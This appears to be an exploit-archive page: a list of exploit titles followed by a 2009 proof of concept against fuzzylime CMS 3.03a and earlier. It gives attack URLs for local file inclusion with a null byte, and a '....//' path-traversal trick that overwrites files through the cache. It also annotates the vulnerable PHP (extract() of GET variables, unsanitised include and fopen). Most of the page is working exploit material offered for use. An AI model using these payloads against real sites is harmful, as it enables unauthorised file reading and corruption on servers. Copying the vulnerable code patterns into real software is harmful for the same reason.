477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
78 lines
3 KiB
Text
Executable file
78 lines
3 KiB
Text
Executable file
+------------------------------------------------------------------------+
|
|
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
|
|
+-----------+------------------------------------------------------------+
|
|
| by staker |
|
|
+-----------+---------------------+
|
|
| mail: staker[at]hotmail[dot]it |
|
|
| url: http://cms.fuzzylime.co.uk |
|
|
+---------------------------------+
|
|
|
|
|
|
[1][LFI]
|
|
|
|
http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
|
|
|
|
Vulnerable code: confirm.php (local file inclusion mq=off)
|
|
-----------------------------------------------------------------
|
|
1. <?
|
|
2. @extract($HTTP_GET_VARS); <-------- {1}
|
|
3. @extract($_GET); <----------^
|
|
|
|
27. elseif(isset($e)) { <------- {2}
|
|
28. $filename = "code/mailing/$list.inc.php"; <------- {3}
|
|
29. @include $filename; <------- {4}
|
|
-----------------------------------------------------------------
|
|
1. extract() allows to overwrite any not-defined variable via get
|
|
therefore it works regardless of register_globals settings.
|
|
|
|
2. $e is a variable not defined,therefore become $_GET['e']
|
|
3. $list is a variable not defined,therefore become $_GET['list']
|
|
4. $filename contains $list variable that will be required
|
|
-----------------------------------------------------------------
|
|
|
|
|
|
[2][LFI]
|
|
|
|
http://[target]/[path]/code/display.php?template= {file + nullbyte}
|
|
|
|
Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
|
|
--------------------------------------------------------------------
|
|
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
|
|
--------------------------------------------------------------------
|
|
|
|
|
|
|
|
|
|
[3][LFC]
|
|
|
|
http://[target]/[path]/code/display.php?usecache=1&s=....//settings
|
|
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)
|
|
|
|
Vulnerable code: display.php (local file corruption register_gl=1)
|
|
-----------------------------------------------------------------
|
|
1. <?
|
|
2. $s = $_GET[s];
|
|
3. $p = $_GET[p];
|
|
4. $s = str_replace("../", "", $s); <---------- {1}
|
|
5. $p = str_replace("../", "", $p);
|
|
...
|
|
54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
|
|
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
|
|
101. if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
|
|
102. $output = ob_get_contents();
|
|
103. fputs($handle, $output);
|
|
104.
|
|
105. fclose($handle);
|
|
106. }
|
|
107. }
|
|
----------------------------------------------------------------------
|
|
1. you have to use ....// to change directory because of 1st point. so
|
|
....// will be ../
|
|
2. $cachefile contains $s variable
|
|
3. if $usecache == 1 we will go ahead
|
|
4. you will overwrite a file typing the name via $s variable.
|
|
-----------------------------------------------------------------------
|
|
|
|
[x] http://www.youtube.com/watch?v=h3DQmJOkSY0
|
|
|
|
# milw0rm.com [2009-06-17]
|